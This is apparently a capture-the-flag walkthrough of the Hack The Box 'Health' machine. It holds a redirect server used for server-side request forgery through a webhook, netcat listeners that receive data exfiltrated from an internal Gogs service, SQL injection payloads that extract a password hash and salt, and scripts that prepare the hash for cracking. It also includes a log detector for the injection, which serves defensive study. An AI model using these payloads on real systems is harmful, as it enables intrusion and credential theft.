1. Information Gathering
TARGET=10.129.179.184 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
┌──(kali㉿kali)-[~/Desktop/HTB/Health]
└─$ cat nmap_tcp_all.nmap
# Nmap 7.92 scan initiated Thu Dec 22 08:27:53 2022 as: nmap -p22,80,3000 -sC -sV -Pn -vvv -oN nmap_tcp_all.nmap 10.129.179.184
Nmap scan report for 10.129.179.184 (10.129.179.184)
Host is up, received user-set (0.23s latency).
Scanned at 2022-12-22 08:27:54 EST for 20s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 32:b7:f4:d4:2f:45:d3:30:ee:12:3b:03:67:bb:e6:31 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChNRnKkpENG89qQHjD+2Kt9H7EDTMkQpzin70Rok0geRogbYVckxywChDv3yYhaDWQ9RrsOcWLs3uGzZR9nCfXOE3uTENbSWV5GdCd3wQNmWcSlkTD4dRcZshaAoMjs1bwzhK+cOy3ZU/ywbIXdHvAz3+Xvyz5yoEnboWYdWtBNFniZ7y/mZtA/XN19sCt5PcmeY40YFSuaVy/PUQnozplBVBIN6W5gnSE0Y+3J1MLBUkvf4+5zKvC+WLqA394Y1M+/UcVcPAjo6maik1JZNAmquWWo+y+28PdXSm9F2p2HAvwJjXc96f+Fl80+P4j1yxrhWC5AZM8fNCX8FjD7Jl7
| 256 86:e1:5d:8c:29:39:ac:d7:e8:15:e6:49:e2:35:ed:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOR0vwVJwhe/5A7dkomT/li2XC2nvv6/4J6Oe8Xeyi/YQspx3RQGz3aG1sWTPstLu7yno0Z+Lk/GotRdyivSdLA=
| 256 ef:6b:ad:64:d5:e4:5b:3e:66:79:49:f4:ec:4c:23:9f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINgiR3y8U+HenhKVoN1EFipbmC6EjO3fWwWPUqa8EeJh
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-title: HTTP Monitoring Tool
3000/tcp filtered ppp no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 22 08:28:14 2022 -- 1 IP address (1 host up) scanned in 20.33 seconds
No domain name on port 80?
Indeed there isn't...
Bind a domain name first.
We can create a webhook and test it.
What we do is send a request to a service we set up ourselves; that service redirects the request to the target's own localhost on port 3000 (the port we saw as filtered), and we receive the response on port 4444.
For that we use a simple script that issues a redirect whenever it receives a request.
#!/usr/bin/python3
# Minimal redirector: every GET is answered with a 302 whose Location is the
# URL given as the first command-line argument.
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[1])
        self.end_headers()

# Listen on all interfaces on port 80 (needs root) and serve forever.
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
python3 redirect.py http://127.0.0.1:3000/
We let netcat listen on 4444 and run the exploit with the url parameter.
nc -nvlp 4444
Testing how the script behaves: it redirects the request to the target's own 127.0.0.1:3000.
When the target makes that request, it sends the page source to our netcat listener.
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 55864
POST / HTTP/1.1
Host: 10.10.14.64:4444
Accept: */*
Content-type: application/json
Content-Length: 7663
Expect: 100-continue
{"webhookUrl":"http:\/\/10.10.14.64:4444\/","monitoredUrl":"http:\/\/10.10.14.64","health":"up","body":"<!DOCTYPE html>\n<html>\n\t<head data-suburl=\"\">\n\t\t<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"\/>\n <meta name=\"author\" content=\"Gogs - Go Git Service\" \/>\n\t\t<meta name=\"description\" content=\"Gogs(Go Git Service) a painless self-hosted Git Service written in Go\" \/>\n\t\t<meta name=\"keywords\" content=\"go, git, self-hosted, gogs\">\n\t\t<meta name=\"_csrf\" content=\"5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng==\" \/>\n\t\t\n\n\t\t<link rel=\"shortcut icon\" href=\"\/img\/favicon.png\" \/>\n\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/\/maxcdn.bootstrapcdn.com\/font-awesome\/4.2.0\/css\/font-awesome.min.css\">\n\n\t\t<script src=\"\/\/code.jquery.com\/jquery-1.11.1.min.js\"><\/script>\n\t\t\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/ui.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/gogs.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/tipsy.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/magnific-popup.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/fonts\/octicons.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/css\/github.min.css\">\n\n\t\t\n \t<script src=\"\/ng\/js\/lib\/lib.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.tipsy.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.magnific-popup.min.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/tabs.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/preview.js\"><\/script>\n\t\t<script src=\"\/ng\/js\/gogs.js\"><\/script>\n\n\t\t<title>Gogs: Go Git Service<\/title>\n\t<\/head>\n\t<body>\n\t\t<div id=\"wrapper\">\n\t\t<noscript>Please enable JavaScript in your browser!<\/noscript>\n\n<header id=\"header\">\n <ul class=\"menu menu-line container\" id=\"header-nav\">\n \n\n \n \n <li class=\"right\" id=\"header-nav-help\">\n <a target=\"_blank\" 
href=\"http:\/\/gogs.io\/docs\"><i class=\"octicon octicon-info\"><\/i> Help<\/a>\n <\/li>\n <li class=\"right\" id=\"header-nav-explore\">\n <a href=\"\/explore\"><i class=\"octicon octicon-globe\"><\/i> Explore<\/a>\n <\/li>\n \n \n <\/ul>\n<\/header>\n<div id=\"promo-wrapper\">\n <div class=\"container clear\">\n <div id=\"promo-logo\" class=\"left\">\n <img src=\"\/img\/gogs-lg.png\" alt=\"logo\" \/>\n <\/div>\n <div id=\"promo-content\">\n <h1>Gogs<\/h1>\n <h2>A painless self-hosted Git service written in Go<\/h2>\n <form id=\"promo-form\" action=\"\/user\/login\" method=\"post\">\n <input type=\"hidden\" name=\"_csrf\" value=\"5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng==\">\n <input class=\"ipt ipt-large\" id=\"username\" name=\"uname\" type=\"text\" placeholder=\"Username or E-mail\"\/>\n <input class=\"ipt ipt-large\" name=\"password\" type=\"password\" placeholder=\"Password\"\/>\n <input name=\"from\" type=\"hidden\" value=\"home\">\n <button class=\"btn btn-black btn-large\">Sign In<\/button>\n <button class=\"btn btn-green btn-large\" id=\"register-button\">Register<\/button>\n <\/form>\n <div id=\"promo-social\" class=\"social-buttons\">\n \n\n\n\n <\/div>\n <\/div> \n <\/div>\n<\/div>\n<div id=\"feature-wrapper\">\n <div class=\"container clear\">\n \n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-flame\"><\/i>\n <b>Easy to install<\/b>\n <p>Simply <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_binary.html\">run the binary<\/a> for your platform. 
Or ship Gogs with <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/tree\/master\/dockerfiles\">Docker<\/a> or <a target=\"_blank\" href=\"https:\/\/github.com\/geerlingguy\/ansible-vagrant-examples\/tree\/master\/gogs\">Vagrant<\/a>, or get it <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_packages.html\">packaged<\/a>.<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-device-desktop\"><\/i>\n <b>Cross-platform<\/b>\n <p>Gogs runs anywhere <a target=\"_blank\" href=\"http:\/\/golang.org\/\">Go<\/a> can compile for: Windows, Mac OS X, Linux, ARM, etc. Choose the one you love!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-rocket\"><\/i>\n <b>Lightweight<\/b>\n <p>Gogs has low minimal requirements and can run on an inexpensive Raspberry Pi. Save your machine energy!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-code\"><\/i>\n <b>Open Source<\/b>\n <p>It's all on <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/\">GitHub<\/a>! Join us by contributing to make this project even better. 
Don't be shy to be a contributor!<\/p>\n <\/div>\n \n <\/div>\n<\/div>\n\t\t<\/div>\n\t\t<footer id=\"footer\">\n\t\t <div class=\"container clear\">\n\t\t <p class=\"left\" id=\"footer-rights\">\u00a9 2014 GoGits \u00b7 Version: 0.5.5.1010 Beta \u00b7 Page: <strong>1ms<\/strong> \u00b7\n\t\t Template: <strong>1ms<\/strong><\/p>\n\n\t\t <div class=\"right\" id=\"footer-links\">\n\t\t <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\"><i class=\"fa fa-github-square\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/twitter.com\/gogitservice\"><i class=\"fa fa-twitter\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/plus.google.com\/communities\/115599856376145964459\"><i class=\"fa fa-google-plus\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"http:\/\/weibo.com\/gogschina\"><i class=\"fa fa-weibo\"><\/i><\/a>\n\t\t <div id=\"footer-lang\" class=\"inline drop drop-top\">Language\n\t\t <div class=\"drop-down\">\n\t\t <ul class=\"menu menu-vertical switching-list\">\n\t\t \t\n\t\t <li><a href=\"#\">English<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-CN\">\u7b80\u4f53\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-HK\">\u7e41\u9ad4\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=de-DE\">Deutsch<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=fr-CA\">Fran\u00e7ais<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=nl-NL\">Nederlands<\/a><\/li>\n\t\t \n\t\t <\/ul>\n\t\t <\/div>\n\t\t <\/div>\n\t\t <a target=\"_blank\" href=\"http:\/\/gogs.io\">Website<\/a>\n\t\t <span class=\"version\">Go1.3.2<\/span>\n\t\t <\/div>\n\t\t <\/div>\n\t\t<\/footer>\n\t<\/body>\n<\/html>","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.5","Date":"Thu, 22 Dec 2022 13:46:18 GMT","Location":"http:\/\/127.0.0.1:3000\/","Content-Type":"text\/html; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0"}}
By reformatting the HTML and opening it locally, we can see that the internal service is a Gogs instance.
<!DOCTYPE html>
<html>
<head data-suburl="">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="author" content="Gogs - Go Git Service" />
<meta
name="description"
content="Gogs(Go Git Service) a painless self-hosted Git Service written in Go"
/>
<meta name="keywords" content="go, git, self-hosted, gogs" />
<meta
name="_csrf"
content="5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng=="
/>
<link rel="shortcut icon" href="/img/favicon.png" />
<link
rel="stylesheet"
href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css"
/>
<script src="//code.jquery.com/jquery-1.11.1.min.js"></script>
<link rel="stylesheet" href="/ng/css/ui.css" />
<link rel="stylesheet" href="/ng/css/gogs.css" />
<link rel="stylesheet" href="/ng/css/tipsy.css" />
<link rel="stylesheet" href="/ng/css/magnific-popup.css" />
<link rel="stylesheet" href="/ng/fonts/octicons.css" />
<link rel="stylesheet" href="/css/github.min.css" />
<script src="/ng/js/lib/lib.js"></script>
<script src="/ng/js/lib/jquery.tipsy.js"></script>
<script src="/ng/js/lib/jquery.magnific-popup.min.js"></script>
<script src="/ng/js/utils/tabs.js"></script>
<script src="/ng/js/utils/preview.js"></script>
<script src="/ng/js/gogs.js"></script>
<title>Gogs: Go Git Service</title>
</head>
<body>
<div id="wrapper">
<noscript>Please enable JavaScript in your browser!</noscript>
<header id="header">
<ul class="menu menu-line container" id="header-nav">
<li class="right" id="header-nav-help">
<a target="_blank" href="http://gogs.io/docs"
><i class="octicon octicon-info"></i> Help</a
>
</li>
<li class="right" id="header-nav-explore">
<a href="/explore"
><i class="octicon octicon-globe"></i> Explore</a
>
</li>
</ul>
</header>
<div id="promo-wrapper">
<div class="container clear">
<div id="promo-logo" class="left">
<img src="/img/gogs-lg.png" alt="logo" />
</div>
<div id="promo-content">
<h1>Gogs</h1>
<h2>A painless self-hosted Git service written in Go</h2>
<form id="promo-form" action="/user/login" method="post">
<input
type="hidden"
name="_csrf"
value="5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng=="
/>
<input
class="ipt ipt-large"
id="username"
name="uname"
type="text"
placeholder="Username or E-mail"
/>
<input
class="ipt ipt-large"
name="password"
type="password"
placeholder="Password"
/>
<input name="from" type="hidden" value="home" />
<button class="btn btn-black btn-large">Sign In</button>
<button class="btn btn-green btn-large" id="register-button">
Register
</button>
</form>
<div id="promo-social" class="social-buttons"></div>
</div>
</div>
</div>
<div id="feature-wrapper">
<div class="container clear">
<div class="grid-1-2 left">
<i class="octicon octicon-flame"></i> <b>Easy to install</b>
<p>
Simply
<a
target="_blank"
href="http://gogs.io/docs/installation/install_from_binary.html"
>run the binary</a
>
for your platform. Or ship Gogs with
<a
target="_blank"
href="https://github.com/gogits/gogs/tree/master/dockerfiles"
>Docker</a
>
or
<a
target="_blank"
href="https://github.com/geerlingguy/ansible-vagrant-examples/tree/master/gogs"
>Vagrant</a
>, or get it
<a
target="_blank"
href="http://gogs.io/docs/installation/install_from_packages.html"
>packaged</a
>.
</p>
</div>
<div class="grid-1-2 left">
<i class="octicon octicon-device-desktop"></i> <b>Cross-platform</b>
<p>
Gogs runs anywhere
<a target="_blank" href="http://golang.org/">Go</a> can compile
for: Windows, Mac OS X, Linux, ARM, etc. Choose the one you love!
</p>
</div>
<div class="grid-1-2 left">
<i class="octicon octicon-rocket"></i> <b>Lightweight</b>
<p>
Gogs has low minimal requirements and can run on an inexpensive
Raspberry Pi. Save your machine energy!
</p>
</div>
<div class="grid-1-2 left">
<i class="octicon octicon-code"></i> <b>Open Source</b>
<p>
It's all on
<a target="_blank" href="https://github.com/gogits/gogs/"
>GitHub</a
>! Join us by contributing to make this project even better. Don't
be shy to be a contributor!
</p>
</div>
</div>
</div>
</div>
<footer id="footer">
<div class="container clear">
<p class="left" id="footer-rights">
© 2014 GoGits · Version: 0.5.5.1010 Beta · Page:
<strong>1ms</strong> · Template: <strong>1ms</strong>
</p>
<div class="right" id="footer-links">
<a target="_blank" href="https://github.com/gogits/gogs"
><i class="fa fa-github-square"></i
></a>
<a target="_blank" href="https://twitter.com/gogitservice"
><i class="fa fa-twitter"></i
></a>
<a
target="_blank"
href="https://plus.google.com/communities/115599856376145964459"
><i class="fa fa-google-plus"></i
></a>
<a target="_blank" href="http://weibo.com/gogschina"
><i class="fa fa-weibo"></i
></a>
<div id="footer-lang" class="inline drop drop-top">
Language
<div class="drop-down">
<ul class="menu menu-vertical switching-list">
<li><a href="#">English</a></li>
<li><a href="/?lang=zh-CN">简体中文</a></li>
<li><a href="/?lang=zh-HK">繁體中文</a></li>
<li><a href="/?lang=de-DE">Deutsch</a></li>
<li><a href="/?lang=fr-CA">Français</a></li>
<li><a href="/?lang=nl-NL">Nederlands</a></li>
</ul>
</div>
</div>
<a target="_blank" href="http://gogs.io">Website</a>
<span class="version">Go1.3.2</span>
</div>
</div>
</footer>
</body>
</html>
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# searchsploit gogs
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gogs - 'label' SQL Injection | multiple/webapps/35237.txt
Gogs - 'users'/'repos' '?q' SQL Injection | multiple/webapps/35238.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
After enumerating with the PoC, we can change the redirect target to our payload.
python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
Continue.
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 48514
POST / HTTP/1.1
Host: 10.10.14.64:4444
Accept: */*
Content-type: application/json
Content-Length: 834
{"webhookUrl":"http:\/\/10.10.14.64:4444\/","monitoredUrl":"http:\/\/10.10.14.64","health":"up","body":"{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],\"ok\":true}","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.5","Date":"Thu, 22 Dec 2022 14:00:01 GMT","Location":"http:\/\/127.0.0.1:3000\/api\/v1\/users\/search?q=')\/**\/union\/**\/all\/**\/select\/**\/1,1,(select\/**\/passwd\/**\/from\/**\/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--","Content-Type":"application\/json; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0","Content-Length":"264"}}
By tidying up the body part, we can see user susanne in the first username field, and in the second username field the contents of the selected passwd column.
https://toolgg.com/json-beautifier.html
{
"webhookUrl": "http://10.10.14.64:4444/",
"monitoredUrl": "http://10.10.14.64",
"health": "up",
"body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",\"avatar\":\"//1.gravatar.com/avatar/1\"}],\"ok\":true}",
"message": "HTTP/1.0 302 Found",
"headers": {
"Server": "BaseHTTP/0.6 Python/3.10.5",
"Date": "Thu, 22 Dec 2022 14:00:01 GMT",
"Location": "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--",
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "_csrf=; Path=/; Max-Age=0",
"Content-Length": "264"
}
}
{
  "data": [
    { "username": "susanne", "avatar": "//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce" },
    { "username": "66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37", "avatar": "//1.gravatar.com/avatar/1" }
  ],
  "ok": true
}
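The payload above hides its keywords behind inline `/**/` comments, which is exactly what a naive `union select` signature misses. The following detector is an added example (not part of the original write-up) that normalises the query string of each access-log request and flags UNION-based injection against the Gogs search endpoint. The log lines, addresses and timestamps are constructed for the demonstration; the log format assumed is the Common Log Format.

```python
#!/usr/bin/env python3
"""Flag comment-obfuscated UNION SELECT injection in web access logs.

Added example, not from the original write-up. The sample lines below are
constructed; the second and third carry the same style of payload that the
write-up sends through the webhook redirect (the third one percent-encoded,
as a real HTTP client would send it).
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_LOG = """\
127.0.0.1 - - [22/Dec/2022:14:00:00 +0000] "GET /api/v1/users/search?q=susanne HTTP/1.1" 200 128
127.0.0.1 - - [22/Dec/2022:14:00:01 +0000] "GET /api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1-- HTTP/1.1" 200 264
127.0.0.1 - - [22/Dec/2022:14:04:39 +0000] "GET /api/v1/users/search?q=%27%29%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1-- HTTP/1.1" 200 174
10.10.14.64 - - [22/Dec/2022:14:05:10 +0000] "GET /explore HTTP/1.1" 200 4096
"""

# Common Log Format: src ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Matched only after normalisation, i.e. once comments have become spaces.
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/")


def normalise(value: str) -> str:
    """Undo one extra layer of percent-encoding (double encoding) and collapse
    inline SQL comments to single spaces so the signature sees plain SQL."""
    decoded = unquote(unquote(value))
    return INLINE_COMMENT_RE.sub(" ", decoded)


def inspect_query(target: str):
    """Return (param, raw_value) pairs whose value looks like a UNION SELECT."""
    parts = urlsplit(target)
    hits = []
    # parse_qs already decodes percent-encoding once and turns '+' into space.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            if SQLI_RE.search(normalise(v)):
                hits.append((name, v))
    return hits


def scan_log(text: str):
    """One finding per request whose query string matches the signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_query(m["target"])
        if hits:
            findings.append({
                "src": m["src"],
                "ts": m["ts"],
                "path": urlsplit(m["target"]).path,
                "params": [name for name, _ in hits],
                "status": m["status"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['path']} "
              f"param={','.join(f['params'])} status={f['status']}")
```

Two of the four constructed lines are flagged; both come from 127.0.0.1, which is itself the tell in this case: the Gogs API on port 3000 is only reachable from the box, so search requests that originate from localhost carrying SQL keywords point at the health checker being used as a relay.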
We do exactly the same thing, but swap the passwd column for the salt column.
python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 44608
POST / HTTP/1.1
Host: 10.10.14.64:4444
Accept: */*
Content-type: application/json
Content-Length: 742
{"webhookUrl":"http:\/\/10.10.14.64:4444\/","monitoredUrl":"http:\/\/10.10.14.64","health":"up","body":"{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"sO3XIbeW14\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],\"ok\":true}","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.5","Date":"Thu, 22 Dec 2022 14:04:39 GMT","Location":"http:\/\/127.0.0.1:3000\/api\/v1\/users\/search?q=')\/**\/union\/**\/all\/**\/select\/**\/1,1,(select\/**\/salt\/**\/from\/**\/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--","Content-Type":"application\/json; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0","Content-Length":"174"}}
{
"webhookUrl": "http://10.10.14.64:4444/",
"monitoredUrl": "http://10.10.14.64",
"health": "up",
"body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"sO3XIbeW14\",\"avatar\":\"//1.gravatar.com/avatar/1\"}],\"ok\":true}",
"message": "HTTP/1.0 302 Found",
"headers": {
"Server": "BaseHTTP/0.6 Python/3.10.5",
"Date": "Thu, 22 Dec 2022 14:04:39 GMT",
"Location": "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--",
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "_csrf=; Path=/; Max-Age=0",
"Content-Length": "174"
}
}
After reformatting, we can likewise see the salt value in the second username field.
{
  "data": [
    { "username": "susanne", "avatar": "//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce" },
    { "username": "sO3XIbeW14", "avatar": "//1.gravatar.com/avatar/1" }
  ],
  "ok": true
}
So we have the username, the credential hash and the salt:
susanne:66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37
salt:sO3XIbeW14
According to the Gogs source code, the hash function is PBKDF2:
PBKDF2([]byte(u.Passwd), []byte(u.Salt), 10000, 50, sha256.New)
password, salt []byte, iter, keyLen int, h func() hash.Hash
Check the hashcat documentation for the expected format: https://hashcat.net/wiki/doku.php?id=example_hashes
sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt
Note that the stored credential hash is the hexadecimal representation of the raw hash bytes, so we first need to convert it back to bytes. The hash line should then be laid out as:
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# echo 'sha256:10000:'$(echo 'sO3XIbeW14' | base64 | cut -c1-14)':'$(echo '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37' | xxd -r -p | base64)
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─#
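As an added example (not from the original write-up), the following Python rebuilds the hashcat line from the hex hash and salt above using the PBKDF2 parameters quoted from the Gogs source (HMAC-SHA256, 10000 iterations, 50-byte key), and verifies a candidate password locally without hashcat. One caveat the terminal pipeline above hides: `echo 'sO3XIbeW14' | base64` also encodes the trailing newline, which is why the salt had to be cut to 14 characters; the result is base64 without its `==` padding, which hashcat tolerates but other tools may not. Encoding the bytes directly avoids the problem.

```python
#!/usr/bin/env python3
"""Rebuild the hashcat -m 10900 line for a Gogs hash and verify a candidate.

Added example, not part of the original write-up. Parameters come from the
Gogs call quoted above:
    PBKDF2([]byte(u.Passwd), []byte(u.Salt), 10000, 50, sha256.New)
Gogs stores the 50-byte result hex-encoded; hashcat mode 10900 wants
    sha256:<iterations>:<base64 salt>:<base64 hash>
"""
import base64
import hashlib
import hmac

ITERATIONS = 10_000
KEY_LEN = 50

# Values recovered earlier in the write-up.
USERNAME = "susanne"
HEX_HASH = ("66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0"
            "d6c032f0fd4ef83f48d74349ec196f4efe37")
SALT = "sO3XIbeW14"


def gogs_hash(password: str, salt: str) -> str:
    """Hex PBKDF2-HMAC-SHA256 digest, laid out the way Gogs stores it."""
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                              ITERATIONS, KEY_LEN)
    return raw.hex()


def hashcat_line(hex_hash: str, salt: str, iterations: int = ITERATIONS) -> str:
    """Format the stored hash for hashcat mode 10900, with proper padding and
    without any stray newline in the salt."""
    if len(hex_hash) != KEY_LEN * 2:
        raise ValueError(f"expected {KEY_LEN} hash bytes, got {len(hex_hash) // 2}")
    raw = bytes.fromhex(hex_hash)
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_hash = base64.b64encode(raw).decode()
    return f"sha256:{iterations}:{b64_salt}:{b64_hash}"


def verify_candidate(candidate: str, hex_hash: str, salt: str) -> bool:
    """Constant-time check of a single candidate password against the hash."""
    return hmac.compare_digest(gogs_hash(candidate, salt), hex_hash)


if __name__ == "__main__":
    print(hashcat_line(HEX_HASH, SALT))
    for cand in ("Password1", "february15"):
        print(f"{USERNAME}:{cand} -> {verify_candidate(cand, HEX_HASH, SALT)}")
```

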